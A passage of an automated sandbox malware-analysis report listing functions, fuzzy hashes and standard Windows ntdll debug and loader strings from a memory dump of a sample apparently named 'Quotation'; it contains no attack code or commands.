                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be54a3f7b099c6acb152339d87b1fb83a5ef1e71299c8793598be8b457912422
                                                              • Instruction ID: 28cd1dda594e4711b3e88512b1bbb8ce103036a9b8146c17d7b07f188955ed7a
                                                              • Opcode Fuzzy Hash: be54a3f7b099c6acb152339d87b1fb83a5ef1e71299c8793598be8b457912422
                                                              • Instruction Fuzzy Hash: FE900271F05804129180719C4885546480567E0302B55C012E0424914C8A148A5A5361
                                                              Function 33E93090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7537c2aaa9ce68a6d2b4c590c9bcd731f874a322ed7fb809c6fbbf707faff150
                                                              • Instruction ID: 2c0f7f36a4efeb2117c83b8400e49b788af33391c114e3087ca98e05e60e2d33
                                                              • Opcode Fuzzy Hash: 7537c2aaa9ce68a6d2b4c590c9bcd731f874a322ed7fb809c6fbbf707faff150
                                                              • Instruction Fuzzy Hash: 95900271B4140C02D180719C8415707080697D0602F55C012A0024914D86168A6966B1
                                                              Function 33E93010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f81d2748f11b38bb3336c3ffebb6497e35615ba70d2470fbd670227d2dcd657c
                                                              • Instruction ID: 97f1233acb910c073f938f908937e153d8c910b569c5ce6a4d54f039079d7e03
                                                              • Opcode Fuzzy Hash: f81d2748f11b38bb3336c3ffebb6497e35615ba70d2470fbd670227d2dcd657c
                                                              • Instruction Fuzzy Hash: BA900271B0184842D180729C4805B0F490557E1203F95C01AA4156914CC91589595721
                                                              Function 33E94650 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f7898bba6c08b0222eac12088d644f633e5e8d4127ae280670f005da9b04497
                                                              • Instruction ID: b2064bb81007322010e8143ee5dc0f92fdc3566d96e107b0ce979850437f8019
                                                              • Opcode Fuzzy Hash: 5f7898bba6c08b0222eac12088d644f633e5e8d4127ae280670f005da9b04497
                                                              • Instruction Fuzzy Hash: AD9002B1F01504424180719C4805406680567E1302395C116A0554920C861889599269
                                                              Function 33E935C0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e1b0b2c1b0b78b5d721458bc4fd269845ec20b049020240f5ec0d7cf37d4130
                                                              • Instruction ID: 13d601f0575a9a97ccacea85822724ca71a417d8077ddea20154d21b5ef9288a
                                                              • Opcode Fuzzy Hash: 9e1b0b2c1b0b78b5d721458bc4fd269845ec20b049020240f5ec0d7cf37d4130
                                                              • Instruction Fuzzy Hash: 7F900271F0550802D140719C4515706180557D0202F65C412A0424928D87958A5565A2
                                                              Function 33E92BE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4ccc638f5ba7460431306742ad60b6d90a32fb04cd1f97850f50a6fbb1307ca
                                                              • Instruction ID: 9095eadd2a7157cfe28d6db24a5da2a3dd98beb5b26c26448ead23e444d610ae
                                                              • Opcode Fuzzy Hash: e4ccc638f5ba7460431306742ad60b6d90a32fb04cd1f97850f50a6fbb1307ca
                                                              • Instruction Fuzzy Hash: 35900271B0544C42D180719C4405A46081557D0306F55C012A0064A54D96258E59B661
                                                              Function 33E92BA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e048cabef49cbfea084cf6dbe19f51e00759185180fd415c2468d5da1c26cb3d
                                                              • Instruction ID: e89ae0983d14d87e5ced472bed3e1665dde579f2af9fb06d7a9b2f5ce973e27b
                                                              • Opcode Fuzzy Hash: e048cabef49cbfea084cf6dbe19f51e00759185180fd415c2468d5da1c26cb3d
                                                              • Instruction Fuzzy Hash: 10900271F0540C02D190719C4415746080557D0302F55C012A0024A14D87558B5976A1
                                                              Function 33E92B80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8d56be293e38a9e52faa55fd0858790629419619b07506354169d37f8e33e5c
                                                              • Instruction ID: e1acf182a547e951232845801a0e4280b3bcf0b90ef6a5ce0d8ff7a98467e2c6
                                                              • Opcode Fuzzy Hash: f8d56be293e38a9e52faa55fd0858790629419619b07506354169d37f8e33e5c
                                                              • Instruction Fuzzy Hash: FF900271B0140C02D144719C4805686080557D0302F55C012A6024A15E966589957131
                                                              Function 33E92AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bda75c600b6f3f62d3352ff1e71548915ce43a02dd556b527c9657ec258788ca
                                                              • Instruction ID: f8f87b062de00ffc2ceaf5dd6c9d5ce30bb39702e27122773ed5bb0d4c046aef
                                                              • Opcode Fuzzy Hash: bda75c600b6f3f62d3352ff1e71548915ce43a02dd556b527c9657ec258788ca
                                                              • Instruction Fuzzy Hash: E5900275B21404020185B59C060550B0C4567D6352395C016F1416950CC62189695321
                                                              Function 33E92AB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1921b1267293a29aa90c03c16547396cc494b56eae89a3e30e879d26f74538e0
                                                              • Instruction ID: 5b064fb184baa3f7caeb04bea6e0c4ec673ee372e2f807bfaa2d2d9940ef24d5
                                                              • Opcode Fuzzy Hash: 1921b1267293a29aa90c03c16547396cc494b56eae89a3e30e879d26f74538e0
                                                              • Instruction Fuzzy Hash: F49002F1B01544924540B29C8405B0A4D0557E0202B55C017E1054920CC52589559135
                                                              Function 33E939B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a2ba17ae7283d055819717d55f572dd0083aab817a3585d88f6d5991973df81
                                                              • Instruction ID: 31f57ab211409b1eb6e53a28089d478c841edf62d313701506116a80c408fe08
                                                              • Opcode Fuzzy Hash: 5a2ba17ae7283d055819717d55f572dd0083aab817a3585d88f6d5991973df81
                                                              • Instruction Fuzzy Hash: 8F900271B4545502D190719C4405616480577E0202F55C022A0814954D855589596221
                                                              Function 33E92FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2ae42c83f82456d2de8a8bbe050e77fae7f520f1c96a5347a474c3a533963d8
                                                              • Instruction ID: cf0b45d1dcafb6c90cd9d83f6d4736fd46a0dcc1d7aa617bafd925972249b963
                                                              • Opcode Fuzzy Hash: c2ae42c83f82456d2de8a8bbe050e77fae7f520f1c96a5347a474c3a533963d8
                                                              • Instruction Fuzzy Hash: 5D900271B0180802D140719C4809747080557D0303F55C012A5164915E8665C9956531
                                                              Function 33E92F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1604cca2702ef88d698a3da435ad103c6a7d3861b036e92d5041a8e6e5d93903
                                                              • Instruction ID: d0e23d5fb753c30723b59102faa25946a9e290f8f0a690a6bd89f1524acd4552
                                                              • Opcode Fuzzy Hash: 1604cca2702ef88d698a3da435ad103c6a7d3861b036e92d5041a8e6e5d93903
                                                              • Instruction Fuzzy Hash: 959002B1B1140442D144719C4405706084557E1202F55C013A2154914CC5298D655125
                                                              Function 33E92890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: ab53b0510fc739dab6e53855ee4d7b3cce0681af8b24690ba0ca4ed242e18774
                                                              • Instruction ID: 230a311b33bda53fb8cdd61267c88a60d9eaa09e29342b2f7760c0b7f9ea8221
                                                              • Opcode Fuzzy Hash: ab53b0510fc739dab6e53855ee4d7b3cce0681af8b24690ba0ca4ed242e18774
                                                              • Instruction Fuzzy Hash: 3551E7B6A0025AAFEF50DF98C9809BEF7BCBB08244754C569E4A4D7641D638DE108BE0
                                                              Function 33F2A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP:
                                                              • API String ID: 3446177414-2466845122
                                                              • Opcode ID: a14c1cdcb90682f105f40097931ccf27984e9619513408cda30cf60cec01aa6c
                                                              • Instruction ID: 6f7ad6b7968fe82ac7789e4bbabf402a2090d7ff90671d3e63de8027f548d240
                                                              • Opcode Fuzzy Hash: a14c1cdcb90682f105f40097931ccf27984e9619513408cda30cf60cec01aa6c
                                                              • Instruction Fuzzy Hash: F5A1A179A14312CFDB04CE18C890A5ABBE5FF88750F894A6DE945DB350EB30DC46CB91
                                                              Function 33E87630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Execute=1, xrefs: 33EC4713
                                                              • ExecuteOptions, xrefs: 33EC46A0
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33EC4655
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 33EC4787
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33EC4725
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33EC4742
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33EC46FC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: a2ec7b62abc8574f82613003a46b356b1d42241fe84fe66e30bc563cbeb3f0f6
                                                              • Instruction ID: e2ebe2daf65bf6c65630c0ebf5022e0b7c7bf30a255c5ac1684ec9ea73285d00
                                                              • Opcode Fuzzy Hash: a2ec7b62abc8574f82613003a46b356b1d42241fe84fe66e30bc563cbeb3f0f6
                                                              • Instruction Fuzzy Hash: 66514675E0132CAEEB11DFA4DC95FEE33B8AF44714F4400A9E509AB180EB719A42EF50
                                                              Function 33E6A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 33EB79D0, 33EB79F5
                                                              • SsHd, xrefs: 33E6A3E4
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB79D5
                                                              • Actx , xrefs: 33EB7A0C, 33EB7A73
                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33EB7AE6
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB79FA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                              • API String ID: 0-1988757188
                                                              • Opcode ID: dddecfc0147d02f505a6840560af8e6e55277ba13f387e2874307e48fce6cc7c
                                                              • Instruction ID: 33eac7aa978c47b2b4d43482029ffc036e17035ad4e689492976a100561b0e72
                                                              • Opcode Fuzzy Hash: dddecfc0147d02f505a6840560af8e6e55277ba13f387e2874307e48fce6cc7c
                                                              • Instruction Fuzzy Hash: 0DE19EB4B483018FEB11CE24C894B1AB7F5AF8435CF584A2DF8A5CB691DB31E9458B91
                                                              Function 33E6D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • GsHd, xrefs: 33E6D874
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 33EB9341, 33EB9366
                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33EB9565
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB9346
                                                              • Actx , xrefs: 33EB9508
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB936B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                              • API String ID: 3446177414-2196497285
                                                              • Opcode ID: fef7fa235eec3fadb0d051a46afce94910572695cbbc532907e634523886acbe
                                                              • Instruction ID: 1ff40aa3d3fc3377d0235acc374ee50ea66f7a676eb9658bf25b2c24fa085a2a
                                                              • Opcode Fuzzy Hash: fef7fa235eec3fadb0d051a46afce94910572695cbbc532907e634523886acbe
                                                              • Instruction Fuzzy Hash: F4E17F746483428FEB11CF54C880B5BB7F4BB8835CF884A6DF8959B291D771E944CB52
                                                              Function 33EFF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                              • API String ID: 3446177414-1745908468
                                                              • Opcode ID: 9c738e82e5ed6d395611a5a041b80f9052f1165154dac1d29a454c2f434d3e27
                                                              • Instruction ID: 875e6612806fc78686b820125583594dcb9dd287ece60e11632ae6b02c5d84b4
                                                              • Opcode Fuzzy Hash: 9c738e82e5ed6d395611a5a041b80f9052f1165154dac1d29a454c2f434d3e27
                                                              • Instruction Fuzzy Hash: 6C913035900785DFDB01CFA8C440AADFBF1FF49318F5A8159E494AB7A2CBB29842CB50
                                                              Function 33E4645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 33E4656C
                                                                • Part of subcall function 33E465B5: RtlDebugPrintTimes.NTDLL ref: 33E46664
                                                                • Part of subcall function 33E465B5: RtlDebugPrintTimes.NTDLL ref: 33E466AF
                                                              Strings
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33EA9A01
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 33EA99ED
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EA9A11, 33EA9A3A
                                                              • LdrpInitShimEngine, xrefs: 33EA99F4, 33EA9A07, 33EA9A30
                                                              • apphelp.dll, xrefs: 33E46496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 33EA9A2A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-204845295
                                                              • Opcode ID: 1e42d120366784e4be7f39fe9fc7d279d86c3832c072248890204a353e3954ae
                                                              • Instruction ID: eb0cce1e4eafb4b01abfee2010d8b61f35cd886a461b4b8a6ada3a18b7e2274b
                                                              • Opcode Fuzzy Hash: 1e42d120366784e4be7f39fe9fc7d279d86c3832c072248890204a353e3954ae
                                                              • Instruction Fuzzy Hash: 4651D2716183049FE720DF24D890B9B77E8FF88754F84491AF5D5AB261DB30E904CB92
                                                              Function 33E465B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33EA9AF6
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EA9AC5, 33EA9B06
                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33EA9AB4
                                                              • LdrpLoadShimEngine, xrefs: 33EA9ABB, 33EA9AFC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
